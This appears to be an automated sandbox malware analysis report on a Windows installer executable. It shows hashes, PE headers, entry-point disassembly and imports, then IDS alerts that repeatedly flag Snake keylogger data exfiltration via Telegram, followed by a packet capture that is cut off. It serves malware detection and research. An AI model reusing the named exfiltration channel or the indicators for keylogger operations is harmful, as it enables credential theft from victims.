                                                                                                            SHA1:13e891bfc3bcd410b284986d7baf8672255dcbdb
                                                                                                            SHA256:e8e552351ba3c8a3f713a970b114fb7b80bd6474f62a88b977fe3bc35b57e9a7
                                                                                                            SHA512:ac317944427780966288021cb61caa6de9c9d13875ae1150d7076b3322b6c6d28ff1245d9c8127b3ce7144c86a5b209e87b2f29822f2e732b147811fcc241281
                                                                                                            SSDEEP:24576:9jwKCNK6KMnoaM5I4CSyH8xkAkXeWEhXBSqwGB7e7aP0Xl4jI61GPVSMrL:V1CvVnoatIkLs1wGaaP0XejI6cSMrL
                                                                                                            TLSH:0D25230DBDC4FD03C82BC9F0AD2E9A12BD2DFD079961E6A32384AD1C3D36655492CB59
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                            Icon Hash:46224e4c19391d03
                                                                                                            Entrypoint:0x4034a5
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                            Instruction
                                                                                                            sub esp, 000002D4h
                                                                                                            push ebx
                                                                                                            push esi
                                                                                                            push edi
                                                                                                            push 00000020h
                                                                                                            pop edi
                                                                                                            xor ebx, ebx
                                                                                                            push 00008001h
                                                                                                            mov dword ptr [esp+14h], ebx
                                                                                                            mov dword ptr [esp+10h], 0040A230h
                                                                                                            mov dword ptr [esp+1Ch], ebx
                                                                                                            call dword ptr [004080ACh]
                                                                                                            call dword ptr [004080A8h]
                                                                                                            and eax, BFFFFFFFh
                                                                                                            cmp ax, 00000006h
                                                                                                            mov dword ptr [0042A24Ch], eax
                                                                                                            je 00007F080C9EE313h
                                                                                                            push ebx
                                                                                                            call 00007F080C9F15DDh
                                                                                                            cmp eax, ebx
                                                                                                            je 00007F080C9EE309h
                                                                                                            push 00000C00h
                                                                                                            call eax
                                                                                                            mov esi, 004082B0h
                                                                                                            push esi
                                                                                                            call 00007F080C9F1557h
                                                                                                            push esi
                                                                                                            call dword ptr [00408150h]
                                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                                            cmp byte ptr [esi], 00000000h
                                                                                                            jne 00007F080C9EE2ECh
                                                                                                            push 0000000Ah
                                                                                                            call 00007F080C9F15B0h
                                                                                                            push 00000008h
                                                                                                            call 00007F080C9F15A9h
                                                                                                            push 00000006h
                                                                                                            mov dword ptr [0042A244h], eax
                                                                                                            call 00007F080C9F159Dh
                                                                                                            cmp eax, ebx
                                                                                                            je 00007F080C9EE311h
                                                                                                            push 0000001Eh
                                                                                                            call eax
                                                                                                            test eax, eax
                                                                                                            je 00007F080C9EE309h
                                                                                                            or byte ptr [0042A24Fh], 00000040h
                                                                                                            push ebp
                                                                                                            call dword ptr [00408044h]
                                                                                                            push ebx
                                                                                                            call dword ptr [004082A0h]
                                                                                                            mov dword ptr [0042A318h], eax
                                                                                                            push ebx
                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                            push 000002B4h
                                                                                                            push eax
                                                                                                            push ebx
                                                                                                            push 004216E8h
                                                                                                            call dword ptr [00408188h]
                                                                                                            push 0040A384h
                                                                                                            Programming Language:
                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                            RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                            RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                            RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                            RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                            RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                            RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                            RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                            RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                            RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                            RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                            RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                            RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                            RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                            RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                            RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                            RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                            RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                            RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                            RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                            RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                            RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                            DLLImport
                                                                                                            KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                            USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-10T22:31:28.793002+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.349957172.217.16.206443TCP
                                                                                                            2025-01-10T22:31:34.578497+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.349979132.226.247.7380TCP
                                                                                                            2025-01-10T22:31:41.875333+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.349979132.226.247.7380TCP
                                                                                                            2025-01-10T22:31:42.502681+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.349981149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:42.795136+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.349981149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:43.734718+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.349982132.226.247.7380TCP
                                                                                                            2025-01-10T22:31:44.296888+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.349983149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:44.660547+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.349983149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:46.023661+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.349986149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:46.373821+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.349986149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:47.725131+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.349988149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:48.072800+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.349988149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:49.422005+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.349990149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:49.912050+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.349990149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:51.226907+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.349992149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:51.599034+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.349992149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:52.992362+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.349994149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:53.232416+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.349994149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:54.576520+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.349996149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:54.979558+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.349996149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:56.344110+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.349998149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:56.646913+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.349998149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:58.069972+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350000149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:58.500953+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350000149.154.167.220443TCP
                                                                                                            2025-01-10T22:31:59.844867+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350002149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:00.211457+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350002149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:01.560579+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350004149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:02.065451+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350004149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:03.401380+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350006149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:03.695686+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350006149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:05.014421+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350008149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:05.323955+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350008149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:06.626429+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350010149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:06.842799+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350010149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:08.187001+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350012149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:08.522045+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350012149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:09.814826+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350014149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:10.028089+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350014149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:11.486908+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350016149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:11.703832+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350016149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:13.012727+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350018149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:13.305255+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350018149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:14.625484+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350020149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:14.921617+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350020149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:16.250162+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350022149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:16.558067+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350022149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:17.871356+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350024149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:18.201123+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350024149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:19.521958+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350026149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:20.147674+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350026149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:21.566377+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350028149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:21.894411+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350028149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:23.239141+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350030149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:23.550116+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350030149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:24.930723+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350032149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:25.157811+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350032149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:26.485485+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350034149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:26.822595+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350034149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:28.148054+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350036149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:28.441661+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350036149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:29.807757+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350038149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:30.103458+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350038149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:31.428691+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350040149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:31.717161+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350040149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:33.080521+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350042149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:33.368274+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350042149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:34.684760+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350044149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:34.949518+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350044149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:36.272050+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350046149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:36.635993+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350046149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:37.963363+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350048149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:38.396117+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350048149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:39.727964+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350050149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:40.009407+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350050149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:41.335109+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350052149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:41.690988+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350052149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:43.019779+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350054149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:43.422528+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350054149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:44.755265+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350056149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:45.173689+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350056149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:46.491451+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350058149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:46.910708+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350058149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:48.273116+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350060149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:48.558073+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350060149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:49.876435+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350062149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:50.365152+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350062149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:51.682684+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350064149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:52.063956+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350064149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:53.379112+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350066149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:53.608952+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350066149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:54.999588+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350068149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:55.407874+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350068149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:56.736013+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350070149.154.167.220443TCP
                                                                                                            2025-01-10T22:32:57.073739+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350070149.154.167.220443TCP
                                                                                                            2025-01-10T22:33:01.011858+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.350072149.154.167.220443TCP
                                                                                                            2025-01-10T22:33:01.419984+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.350072149.154.167.220443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 22:31:27.733100891 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:27.733155012 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:27.733726978 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:27.749548912 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:27.749588013 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.407051086 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.407134056 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:28.408039093 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.408107042 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:28.470081091 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:28.470102072 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.470472097 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.470566034 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:28.475205898 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:28.515347004 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.793009996 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.793067932 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:28.793086052 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.793123960 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:28.793246984 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:28.793289900 CET44349957172.217.16.206192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.793346882 CET49957443192.168.2.3172.217.16.206
                                                                                                            Jan 10, 2025 22:31:28.819082975 CET49963443192.168.2.3172.217.16.129
                                                                                                            Jan 10, 2025 22:31:28.819118023 CET44349963172.217.16.129192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.819195986 CET49963443192.168.2.3172.217.16.129
                                                                                                            Jan 10, 2025 22:31:28.819428921 CET49963443192.168.2.3172.217.16.129
                                                                                                            Jan 10, 2025 22:31:28.819442987 CET44349963172.217.16.129192.168.2.3
                                                                                                            Jan 10, 2025 22:31:29.487622976 CET44349963172.217.16.129192.168.2.3
                                                                                                            Jan 10, 2025 22:31:29.487720966 CET49963443192.168.2.3172.217.16.129
                                                                                                            Jan 10, 2025 22:31:29.491384029 CET49963443192.168.2.3172.217.16.129
                                                                                                            Jan 10, 2025 22:31:29.491391897 CET44349963172.217.16.129192.168.2.3
                                                                                                            Jan 10, 2025 22:31:29.491664886 CET44349963172.217.16.129192.168.2.3
                                                                                                            Jan 10, 2025 22:31:29.491725922 CET49963443192.168.2.3172.217.16.129
                                                                                                            Jan 10, 2025 22:31:29.492027998 CET49963443192.168.2.3172.217.16.129
